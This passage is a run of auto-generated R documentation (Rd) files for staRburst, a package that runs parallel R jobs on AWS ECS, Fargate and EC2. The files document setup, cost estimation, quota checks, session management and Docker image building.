\alias{check_quota_sufficient}
\title{Check if quota is sufficient for plan}
\usage{
check_quota_sufficient(workers, cpu, region)
}
\description{
Check if quota is sufficient for plan
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/utils.R
\name{utils}
\alias{utils}
\title{Utility functions for staRburst}
\description{
General-purpose helpers shared across the package. AWS-specific helpers live
in dedicated files: \code{aws-clients.R} (service clients), \code{cost.R}
(pricing), \code{images.R} (ECR/Docker), \code{task-definition.R} (ECS task
defs), \code{network.R} (VPC), \code{task-registry.R} (task ARNs), and
\code{s3-io.R} (S3 task/result transfer).
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/task-definition.R
\name{ensure_log_group}
\alias{ensure_log_group}
\title{Ensure CloudWatch log group exists}
\usage{
ensure_log_group(log_group_name, region)
}
\description{
Ensure CloudWatch log group exists
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{ensure_environment}
\alias{ensure_environment}
\title{Ensure environment is ready}
\usage{
ensure_environment(region)
}
\description{
Ensure environment is ready
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/quota.R
\name{request_quota_increase}
\alias{request_quota_increase}
\title{Request quota increase}
\usage{
request_quota_increase(service, quota_code, desired_value, region, reason = "")
}
\arguments{
\item{service}{AWS service (e.g., "fargate")}

\item{quota_code}{Service quota code}

\item{desired_value}{Desired quota value}

\item{region}{AWS region}

\item{reason}{Justification for increase}
}
\value{
Case ID if successful, NULL if failed
}
\description{
Request quota increase
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-backend.R
\name{upload_detached_task}
\alias{upload_detached_task}
\title{Upload task for detached session}
\usage{
upload_detached_task(task_id, task_data, backend)
}
\arguments{
\item{task_id}{Task identifier}

\item{task_data}{Task data (expr, globals, packages, session_id)}

\item{backend}{Backend environment}
}
\value{
Invisibly returns NULL
}
\description{
Upload task for detached session
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{print.StarburstSessionStatus}
\alias{print.StarburstSessionStatus}
\title{Print method for session status}
\usage{
\method{print}{StarburstSessionStatus}(x, ...)
}
\arguments{
\item{x}{A StarburstSessionStatus object}

\item{...}{Additional arguments (ignored)}
}
\value{
Invisibly returns \code{x}.
}
\description{
Print method for session status
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/task-registry.R
\name{store_task_arn}
\alias{store_task_arn}
\title{Store task ARN}
\usage{
store_task_arn(task_id, task_arn)
}
\description{
Store task ARN
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{extend_session_timeout}
\alias{extend_session_timeout}
\title{Extend session timeout}
\usage{
extend_session_timeout(session, seconds)
}
\description{
Extend session timeout
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/errors.R
\name{quota_error}
\alias{quota_error}
\title{Quota exceeded error}
\usage{
quota_error(resource, requested, available, region, workers = NULL, cpu = NULL)
}
\description{
Quota exceeded error
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/future-starburst.R
\name{submit_task}
\alias{submit_task}
\title{Submit Task to ECS}
\usage{
submit_task(future, backend)
}
\arguments{
\item{future}{StarburstFuture object}

\item{backend}{Backend/plan object}
}
\description{
Internal function to submit a task to ECS (Fargate or EC2)
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/quota.R
\name{suggest_quota}
\alias{suggest_quota}
\title{Suggest appropriate quota based on needs}
\usage{
suggest_quota(vcpus_needed)
}
\arguments{
\item{vcpus_needed}{vCPUs needed}
}
\value{
Suggested quota value
}
\description{
Suggest appropriate quota based on needs
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/s3-io.R
\name{cleanup_s3_files}
\alias{cleanup_s3_files}
\title{Cleanup S3 files}
\usage{
cleanup_s3_files(plan)
}
\description{
Cleanup S3 files
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plan-starburst.R
\name{cleanup_cluster}
\alias{cleanup_cluster}
\title{Clean up cluster resources}
\usage{
cleanup_cluster(backend)
}
\description{
Clean up cluster resources
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{get_base_image_source}
\alias{get_base_image_source}
\title{Get base image source URI}
\usage{
get_base_image_source(use_public = TRUE)
}
\arguments{
\item{use_public}{Logical, use public ECR base image (default TRUE)}
}
\description{
Get base image source URI
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/s3-io.R
\name{s3-io}
\alias{s3-io}
\title{S3 task/result I/O for staRburst}
\description{
Serialization of task payloads to S3, polling for results, and cleanup of
the per-cluster task objects.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{starburst_config}
\alias{starburst_config}
\title{Configure staRburst options}
\usage{
starburst_config(
  max_hourly_cost = NULL,
  cost_alert_threshold = NULL,
  auto_cleanup_s3 = NULL,
  ...
)
}
\arguments{
\item{max_hourly_cost}{Maximum estimated **hourly** cost (USD/hour) for a job.
Jobs whose estimated hourly rate exceeds this error before launching. This is a
rate limit, not a total-job-cost cap. \code{NULL} leaves it unchanged.}

\item{cost_alert_threshold}{Estimated **hourly** cost (USD/hour) at which a
warning is emitted. \code{NULL} leaves it unchanged.}

\item{auto_cleanup_s3}{Logical; automatically delete a job's S3 task/result
objects after completion. \code{NULL} leaves it unchanged.}

\item{...}{Additional user-settable keys merged into the config. Recognized keys:
\describe{
  \item{\code{use_public_base}}{Logical; pull the public base image instead of
    building a private one (see \code{\link{starburst_setup}}).}
  \item{\code{ecr_image_ttl_days}}{Integer; lifecycle age at which cached ECR
    images are expired.}
}}
}
\value{
Invisibly returns the updated configuration list.
}
\description{
Reads and updates the persisted staRburst configuration. Call with no arguments
to leave settings unchanged (it still returns the current config invisibly); pass
one or more of the arguments below to update them.
}
\details{
Other keys in the stored config are **infrastructure-managed** — written by
\code{\link{starburst_setup}}/\code{\link{starburst_setup_ec2}} and not intended
to be set by hand: \code{region}, \code{bucket}, \code{cluster},
\code{ecr_repository}, \code{aws_account_id}, \code{execution_role_arn},
\code{task_role_arn}, \code{subnets}, and \code{security_groups}. Use
\code{\link{starburst_status}} to inspect the effective configuration read-only.
}
\examples{
\donttest{
if (starburst_is_configured()) {
  # Update cost guardrails (both are hourly rates, USD/hour)
  starburst_config(
    max_hourly_cost = 10,
    cost_alert_threshold = 5
  )

  # Read the current config without changing anything
  cfg <- starburst_config()
}
}
}
\seealso{
\code{\link{starburst_status}} to view config without changing it;
  \code{\link{starburst_setup}} for initial provisioning.
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{starburst_setup}
\alias{starburst_setup}
\title{Setup staRburst}
\usage{
starburst_setup(
  region = "us-east-1",
  force = FALSE,
  use_public_base = TRUE,
  ecr_image_ttl_days = NULL,
  build_image = TRUE,
  setup_ec2 = TRUE
)
}
\arguments{
\item{region}{AWS region (default: "us-east-1")}

\item{force}{Force re-setup even if already configured}

\item{use_public_base}{Use public base Docker images (default: TRUE).
Set to FALSE to build private base images in your ECR.}

\item{ecr_image_ttl_days}{Number of days to keep Docker images in ECR (default: NULL = never delete).
AWS will automatically delete images older than this many days.
This prevents surprise costs if you stop using staRburst.
Recommended: 30 days for regular users, 7 days for occasional users.
When images are deleted, they will be rebuilt on next use (adds 3-5 min).}

\item{build_image}{Build the worker environment image during setup (default: TRUE).
Set to FALSE to provision AWS resources (S3/ECR/ECS/VPC), write config, and
check quotas without triggering the multi-minute Docker image build. The
image is then built lazily on first worker launch via
\code{ensure_environment()}. Useful for CI / connectivity checks.}

\item{setup_ec2}{Provision the EC2 capacity provider and Auto Scaling Group for
the default instance type during setup (default: TRUE). This is what makes the
default EC2 backend work out of the box — without it, the first
\code{starburst_map()}/\code{plan(starburst)} run on EC2 would fail because no
capacity provider exists. It creates infrastructure at \code{DesiredCapacity = 0}
(no billable instances are launched during setup). Set to FALSE if you only use
the Fargate backend, which needs no capacity provider. Provision additional
instance types later with \code{\link{starburst_setup_ec2}}.}
}
\value{
Invisibly returns the configuration list.
}
\description{
One-time configuration to set up AWS resources for staRburst
}
\examples{
\donttest{
if (starburst_is_configured()) {
  # Default: keep images forever (~$0.50/month idle cost)
  starburst_setup()

  # Auto-delete images after 30 days (saves money if you stop using it)
  starburst_setup(ecr_image_ttl_days = 30)

  # Use private base images with 7-day cleanup
  starburst_setup(use_public_base = FALSE, ecr_image_ttl_days = 7)

  # Provision resources without building the image (fast; CI / connectivity checks)
  starburst_setup(build_image = FALSE)
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ec2-pool.R
\name{get_pool_status}
\alias{get_pool_status}
\title{Get pool status}
\usage{
get_pool_status(backend)
}
\arguments{
\item{backend}{Backend configuration object}
}
\value{
List with pool status information
}
\description{
Query current state of the EC2 pool
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-state.R
\name{list_task_statuses}
\alias{list_task_statuses}
\title{List all task statuses in session}
\usage{
list_task_statuses(session_id, region, bucket)
}
\arguments{
\item{session_id}{Session identifier}

\item{region}{AWS region}

\item{bucket}{S3 bucket}
}
\value{
Named list of task statuses (task_id -> status)
}
\description{
List all task statuses in session
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ec2-pool.R
\name{ec2-pool}
\alias{ec2-pool}
\title{EC2 Pool Management for staRburst}
\description{
Functions for managing Auto-Scaling Groups and ECS Capacity Providers
to maintain warm pools of EC2 instances for fast task execution.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/s3-io.R
\name{create_task}
\alias{create_task}
\title{Create task object}
\usage{
create_task(expr, globals, packages, plan)
}
\description{
Create task object
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-backend.R
\name{submit_detached_worker}
\alias{submit_detached_worker}
\title{Submit detached worker to ECS}
\usage{
submit_detached_worker(backend, task_id)
}
\arguments{
\item{backend}{Backend environment}

\item{task_id}{Task ID for the worker to execute}
}
\value{
Task ARN
}
\description{
Submit detached worker to ECS
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{collect_session_results}
\alias{collect_session_results}
\title{Collect results from session}
\usage{
collect_session_results(session, wait, timeout)
}
\description{
Collect results from session
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{build_environment_image}
\alias{build_environment_image}
\title{Build environment image}
\usage{
build_environment_image(tag, region, use_public = NULL)
}
\arguments{
\item{tag}{Image tag}

\item{region}{AWS region}

\item{use_public}{Logical, use public ECR base image (default NULL = from config)}
}
\description{
Build environment image
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/starburst-estimate.R
\name{get_cloud_performance_ratio}
\alias{get_cloud_performance_ratio}
\title{Get Cloud Performance Ratio}
\usage{
get_cloud_performance_ratio(local_specs, platform)
}
\description{
Returns estimated per-core performance of cloud vs local hardware.
Based on empirical benchmarking data.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-state.R
\name{get_session_manifest}
\alias{get_session_manifest}
\title{Get session manifest from S3}
\usage{
get_session_manifest(session_id, region, bucket)
}
\arguments{
\item{session_id}{Session identifier}

\item{region}{AWS region}

\item{bucket}{S3 bucket}
}
\value{
Session manifest list
}
\description{
Get session manifest from S3
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/StarburstBackend-class.R
\name{starburst}
\alias{starburst}
\title{Starburst strategy marker}
\usage{
starburst(...)
}
\arguments{
\item{...}{Arguments passed to StarburstBackend()}
}
\value{
Does not return a value; always signals an error if called directly.
  This object exists as a strategy marker for \code{\link[future]{plan}}.
}
\description{
This function should never be called directly. Use plan(starburst, ...) instead.
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/logs.R
\name{starburst_logs}
\alias{starburst_logs}
\title{View worker logs}
\usage{
starburst_logs(task_id = NULL, cluster_id = NULL, last_n = 50, region = NULL)
}
\arguments{
\item{task_id}{Optional task ID to view logs for specific task}

\item{cluster_id}{Optional cluster ID to view logs for specific cluster}

\item{last_n}{Number of last log lines to show (default: 50)}

\item{region}{AWS region (default: from config)}
}
\value{
Invisibly returns the list of log events, or \code{NULL} if no
  events were found.
}
\description{
View worker logs
}
\examples{
\donttest{
if (starburst_is_configured()) {
  # View recent logs
  starburst_logs()

  # View logs for specific task
  starburst_logs(task_id = "abc-123")

  # View last 100 lines
  starburst_logs(last_n = 100)
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/cost.R
\name{.static_ec2_prices}
\alias{.static_ec2_prices}
\title{Built-in fallback EC2 On-Demand prices (us-east-1, Linux, per hour).}
\usage{
.static_ec2_prices()
}
\description{
Used when the live AWS Pricing API can't be reached (offline, missing perms,
or an unknown type). Kept as a static snapshot so cost estimates always work.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-backend.R
\name{reconstruct_backend_from_manifest}
\alias{reconstruct_backend_from_manifest}
\title{Reconstruct backend from session manifest}
\usage{
reconstruct_backend_from_manifest(manifest)
}
\arguments{
\item{manifest}{Session manifest from S3}
}
\value{
Backend environment
}
\description{
Used when reattaching to an existing session
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/network.R
\name{network}
\alias{network}
\title{VPC, subnet, and security group management for staRburst}
\description{
VPC, subnet, and security group management for staRburst
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/task-definition.R
\name{get_or_create_task_definition}
\alias{get_or_create_task_definition}
\title{Get or create task definition}
\usage{
get_or_create_task_definition(plan)
}
\description{
Get or create task definition
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/errors.R
\name{worker_validation_error}
\alias{worker_validation_error}
\title{Worker validation error}
\usage{
worker_validation_error(workers, max_allowed = 500)
}
\description{
Worker validation error
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/cost.R
\name{get_ec2_ondemand_price}
\alias{get_ec2_ondemand_price}
\title{Look up current On-Demand price via the AWS Pricing API.}
\usage{
get_ec2_ondemand_price(instance_type, region)
}
\description{
Look up current On-Demand price via the AWS Pricing API.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/cost.R
\name{estimate_cost}
\alias{estimate_cost}
\title{Estimate cost}
\usage{
estimate_cost(
  workers,
  cpu,
  memory,
  estimated_runtime_hours = 1,
  launch_type = "FARGATE",
  instance_type = NULL,
  use_spot = FALSE
)
}
\description{
Estimate cost
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-state.R
\name{create_task_status}
\alias{create_task_status}
\title{Create task status in S3}
\usage{
create_task_status(session_id, task_id, state = "pending", region, bucket)
}
\arguments{
\item{session_id}{Session identifier}

\item{task_id}{Task identifier}

\item{state}{Initial state (default: "pending")}

\item{region}{AWS region}

\item{bucket}{S3 bucket}
}
\value{
Invisibly returns NULL
}
\description{
Create task status in S3
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/s3-io.R
\name{serialize_and_upload}
\alias{serialize_and_upload}
\title{Serialize and upload to S3}
\usage{
serialize_and_upload(obj, bucket, key)
}
\description{
Serialize and upload to S3
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/future-starburst.R
\name{future.starburst}
\alias{future.starburst}
\title{Create a Future using Starburst Backend}
\usage{
\method{future}{starburst}(
  expr,
  envir = parent.frame(),
  substitute = TRUE,
  lazy = FALSE,
  seed = FALSE,
  globals = TRUE,
  packages = NULL,
  stdout = TRUE,
  conditions = "condition",
  label = NULL,
  ...
)
}
\arguments{
\item{expr}{Expression to evaluate}

\item{envir}{Environment for evaluation}

\item{substitute}{Whether to substitute the expression}

\item{lazy}{Whether to lazily evaluate (always FALSE for remote)}

\item{seed}{Random seed}

\item{globals}{Globals to export (TRUE for auto-detection, list for manual)}

\item{packages}{Packages to load}

\item{stdout}{Whether to capture stdout (TRUE, FALSE, or NA)}

\item{conditions}{Character vector of condition classes to capture}

\item{label}{Optional label for the future}

\item{...}{Additional arguments}
}
\value{
A StarburstFuture object
}
\description{
This is the entry point called by the Future package when a plan(starburst) is active
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/future-starburst.R
\name{check_and_submit_wave}
\alias{check_and_submit_wave}
\title{Check and Submit Wave if Ready}
\usage{
check_and_submit_wave(backend)
}
\arguments{
\item{backend}{Backend environment}
}
\description{
Checks wave queue and submits next wave if current wave is complete
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/network.R
\name{get_or_create_security_group}
\alias{get_or_create_security_group}
\title{Get or create security group}
\usage{
get_or_create_security_group(vpc_id, region)
}
\description{
Get or create security group
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/quota.R
\name{starburst_check_quota_request}
\alias{starburst_check_quota_request}
\title{Monitor quota increase request}
\usage{
starburst_check_quota_request(case_id, region = NULL)
}
\arguments{
\item{case_id}{Case ID from quota increase request}

\item{region}{AWS region}
}
\value{
Invisibly returns the quota request details, or \code{NULL} on error.
}
\description{
Monitor quota increase request
}
\examples{
\donttest{
if (starburst_is_configured()) {
  starburst_check_quota_request("case-12345")
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/aws-clients.R
\name{get_service_quotas_client}
\alias{get_service_quotas_client}
\title{Get Service Quotas client}
\usage{
get_service_quotas_client(region)
}
\arguments{
\item{region}{AWS region}
}
\value{
Service Quotas client
}
\description{
Get Service Quotas client
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ec2-pool.R
\name{setup_ec2_capacity_provider}
\alias{setup_ec2_capacity_provider}
\title{Setup EC2 capacity provider for ECS cluster}
\usage{
setup_ec2_capacity_provider(backend)
}
\arguments{
\item{backend}{Backend configuration object}
}
\value{
List with capacity provider details
}
\description{
Creates Launch Template, Auto-Scaling Group, and ECS Capacity Provider
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/cost.R
\name{get_ec2_spot_price}
\alias{get_ec2_spot_price}
\title{Look up recent Spot price via EC2 spot-price history (avg across AZs).}
\usage{
get_ec2_spot_price(instance_type, region)
}
\description{
Look up recent Spot price via EC2 spot-price history (avg across AZs).
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{build_initial_environment}
\alias{build_initial_environment}
\title{Build initial environment}
\usage{
build_initial_environment(region)
}
\description{
Build initial environment
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{create_ecr_repository}
\alias{create_ecr_repository}
\title{Create ECR repository}
\usage{
create_ecr_repository(repo_name, region)
}
\description{
Create ECR repository
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plan-starburst.R
\name{get_wave_status}
\alias{get_wave_status}
\title{Get wave queue status}
\usage{
get_wave_status(backend)
}
\arguments{
\item{backend}{Backend environment}
}
\description{
Get wave queue status
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/logs.R
\name{starburst_rebuild_environment}
\alias{starburst_rebuild_environment}
\title{Rebuild environment image}
\usage{
starburst_rebuild_environment(region = NULL, force = FALSE)
}
\arguments{
\item{region}{AWS region (default: from config)}

\item{force}{Force rebuild even if current environment hasn't changed}
}
\value{
Invisibly returns \code{NULL}. Called for its side effect of
  rebuilding and pushing the Docker environment image.
}
\description{
Rebuild environment image
}
\examples{
\donttest{
if (starburst_is_configured()) {
  starburst_rebuild_environment()
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/network.R
\name{get_starburst_subnets}
\alias{get_starburst_subnets}
\title{Get starburst subnets}
\usage{
get_starburst_subnets(region)
}
\arguments{
\item{region}{AWS region}
}
\value{
Vector of subnet IDs
}
\description{
Get starburst subnets
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ec2-pool.R
\name{start_warm_pool}
\alias{start_warm_pool}
\title{Start warm EC2 pool}
\usage{
start_warm_pool(backend, capacity, timeout_seconds = 180)
}
\arguments{
\item{backend}{Backend configuration object}

\item{capacity}{Desired number of instances}

\item{timeout_seconds}{Maximum time to wait for instances (default: 180)}
}
\value{
Invisible NULL
}
\description{
Scales Auto-Scaling Group to desired capacity and waits for instances
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{should_cleanup_s3}
\alias{should_cleanup_s3}
\title{Resolve whether to auto-clean S3 files after a job}
\usage{
should_cleanup_s3()
}
\description{
Order: the \code{starburst.cleanup_s3} option (explicit runtime override), then
the persisted \code{auto_cleanup_s3} config (set via \code{\link{starburst_config}}),
then default \code{TRUE}.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/task-definition.R
\name{task-definition}
\alias{task-definition}
\title{ECS task definitions, IAM roles, and log groups for staRburst}
\description{
ECS task definitions, IAM roles, and log groups for staRburst
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-state.R
\name{create_session_manifest}
\alias{create_session_manifest}
\title{Create session manifest in S3}
\usage{
create_session_manifest(session_id, backend)
}
\arguments{
\item{session_id}{Unique session identifier}

\item{backend}{Backend configuration}
}
\value{
Invisibly returns NULL
}
\description{
Create session manifest in S3
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plan-starburst.R
\name{parse_memory}
\alias{parse_memory}
\title{Parse memory specification}
\usage{
parse_memory(memory)
}
\arguments{
\item{memory}{Memory specification (numeric GB or string like "8GB")}
}
\description{
Parse memory specification
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{check_ecr_image_exists}
\alias{check_ecr_image_exists}
\title{Check if ECR image exists}
\usage{
check_ecr_image_exists(tag, region)
}
\description{
Check if ECR image exists
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/aws-retry.R
\name{aws-retry}
\alias{aws-retry}
\title{AWS Retry Logic}
\description{
Centralized retry logic for AWS operations with exponential backoff
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{build_base_image}
\alias{build_base_image}
\title{Build base Docker image with common dependencies}
\usage{
build_base_image(region)
}
\description{
Build base Docker image with common dependencies
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ec2-pool.R
\name{ensure_ecs_instance_profile}
\alias{ensure_ecs_instance_profile}
\title{Ensure ECS instance IAM profile exists}
\usage{
ensure_ecs_instance_profile(region)
}
\arguments{
\item{region}{AWS region}
}
\value{
Instance profile ARN
}
\description{
Ensure ECS instance IAM profile exists
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/starburst-map.R
\name{starburst_map}
\alias{starburst_map}
\title{Map a Function Over Data on AWS Workers}
\usage{
starburst_map(
  .x,
  .f,
  workers = 10,
  cpu = 4,
  memory = "8GB",
  region = NULL,
  timeout = 3600,
  launch_type = "EC2",
  instance_type = "c7g.xlarge",
  use_spot = TRUE,
  .progress = TRUE,
  ...
)
}
\arguments{
\item{.x}{A vector or list to iterate over}

\item{.f}{A function to apply to each element}

\item{workers}{Number of parallel workers (default: 10)}

\item{cpu}{CPU units per worker (1, 2, 4, 8, or 16)}

\item{memory}{Memory per worker (e.g., 8GB)}

\item{region}{AWS region}

\item{timeout}{Maximum runtime in seconds per task}

\item{launch_type}{Compute backend: "EC2" (default) or "FARGATE"}

\item{instance_type}{EC2 instance type when \code{launch_type = "EC2"}
(default: "c7g.xlarge"). The worker CPU architecture follows the instance
type — Graviton types (e.g. \code{c7g.*}) run ARM64, Intel/AMD types
(e.g. \code{c7i.*}) run x86_64 — so there is no separate platform argument.}

\item{use_spot}{Use EC2 Spot instances for cost savings (default: TRUE)}

\item{.progress}{Show progress bar (default: TRUE)}

\item{...}{Additional arguments passed to .f}
}
\value{
A list of results, one per element of .x
}
\description{
Parallel map function that executes across AWS workers (EC2 by default, or
Fargate) using the staRburst Future backend.
}
\examples{
\donttest{
if (starburst_is_configured()) {
  # Simple parallel computation
  results <- starburst_map(1:100, function(x) x^2, workers = 10)

  # With custom configuration
  results <- starburst_map(
    data_list,
    expensive_function,
    workers = 50,
    cpu = 4,
    memory = "8GB"
  )

  # Use the Fargate backend instead of the EC2 default
  results <- starburst_map(1:100, function(x) x^2,
                           workers = 10, launch_type = "FARGATE")
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/errors.R
\name{starburst_error}
\alias{starburst_error}
\title{Create informative staRburst error}
\usage{
starburst_error(
  message,
  context = list(),
  solution = NULL,
  call = sys.call(-1)
)
}
\arguments{
\item{message}{Main error message}

\item{context}{Named list of contextual information}

\item{solution}{Suggested solution (optional)}

\item{call}{Calling function (default: sys.call(-1))}
}
\value{
Error condition with class "starburst_error"
}
\description{
Creates error messages with context, solutions, and links to documentation
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/quota.R
\name{starburst_quota_status}
\alias{starburst_quota_status}
\title{Show quota status}
\usage{
starburst_quota_status(region = NULL)
}
\arguments{
\item{region}{AWS region (default: from config)}
}
\value{
Invisibly returns a list with quota information including current
  limit, usage, and any pending requests.
}
\description{
Show quota status
}
\examples{
\donttest{
if (starburst_is_configured()) {
  starburst_quota_status()
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/errors.R
\name{errors}
\alias{errors}
\title{Error Handling for staRburst}
\description{
Improved error messages with context and solutions
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{ensure_buildx_builder}
\alias{ensure_buildx_builder}
\title{Ensure a buildx builder with the docker-container driver exists and is usable}
\usage{
ensure_buildx_builder(builder_name = "starburst-builder")
}
\arguments{
\item{builder_name}{Name of the buildx builder (default "starburst-builder")}
}
\value{
TRUE if the named builder is usable, FALSE otherwise
}
\description{
Idempotent across repeated runs and cross-platform (Windows/macOS/Linux).
Probes for an existing builder via \code{docker buildx inspect}; creates it
only when missing; bootstraps it so it is ready to build. A docker-container
driver is required for multi-platform (\code{linux/amd64,linux/arm64})
builds. Does not mutate the user's default buildx context (no \code{--use});
the build pins the builder explicitly via \code{--builder}.
}
\details{
Returns TRUE if the named builder is usable, FALSE otherwise, and never
throws -- callers decide policy. This fixes the failure mode where
\code{buildx create} errored on an already-existing builder, the error was
swallowed, and the subsequent \code{buildx build} failed with "existing
instance for <name> but no append mode" (GitHub #24).
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/StarburstBackend-class.R
\name{StarburstBackend}
\alias{StarburstBackend}
\title{Starburst Future Backend}
\usage{
StarburstBackend(
  workers = 10,
  cpu = 4,
  memory = "8GB",
  region = NULL,
  timeout = 3600,
  launch_type = "EC2",
  instance_type = "c6a.large",
  use_spot = FALSE,
  warm_pool_timeout = 3600,
  ...
)
}
\arguments{
\item{workers}{Number of parallel workers}

\item{cpu}{vCPUs per worker (1, 2, 4, 8, or 16)}

\item{memory}{Memory per worker (supports GB notation, e.g., "8GB")}

\item{region}{AWS region (default: from config or "us-east-1")}

\item{timeout}{Maximum runtime in seconds (default: 3600)}

\item{launch_type}{"EC2" or "FARGATE" (default: "EC2")}

\item{instance_type}{EC2 instance type (e.g., "c6a.large")}

\item{use_spot}{Use spot instances (default: FALSE)}

\item{warm_pool_timeout}{Pool timeout in seconds (default: 3600)}

\item{...}{Additional arguments}
}
\value{
A StarburstBackend object
}
\description{
A future backend for running parallel R workloads on AWS ECS
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-state.R
\name{get_task_status}
\alias{get_task_status}
\title{Get task status from S3}
\usage{
get_task_status(session_id, task_id, region, bucket, include_etag = FALSE)
}
\arguments{
\item{session_id}{Session identifier}

\item{task_id}{Task identifier}

\item{region}{AWS region}

\item{bucket}{S3 bucket}

\item{include_etag}{Include ETag in result (for atomic operations)}
}
\value{
Task status list (with optional $etag field)
}
\description{
Get task status from S3
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/future-starburst.R
\name{run.StarburstFuture}
\alias{run.StarburstFuture}
\title{Run a StarburstFuture}
\usage{
\method{run}{StarburstFuture}(future, ...)
}
\arguments{
\item{future}{A StarburstFuture object}

\item{...}{Additional arguments}
}
\value{
The future object (invisibly)
}
\description{
Submits the future task to AWS for execution (EC2 by default, or Fargate)
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/aws-clients.R
\name{get_aws_account_id}
\alias{get_aws_account_id}
\title{Get AWS account ID}
\usage{
get_aws_account_id()
}
\value{
AWS account ID
}
\description{
Get AWS account ID
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/cost.R
\name{cost}
\alias{cost}
\title{Cost estimation and pricing for staRburst}
\description{
Cost estimation and pricing for staRburst
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/errors.R
\name{task_failure_error}
\alias{task_failure_error}
\title{Task failure error}
\usage{
task_failure_error(task_id, reason = NULL, exit_code = NULL, log_stream = NULL)
}
\description{
Task failure error
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-state.R
\name{atomic_claim_task}
\alias{atomic_claim_task}
\title{Atomically claim a pending task}
\usage{
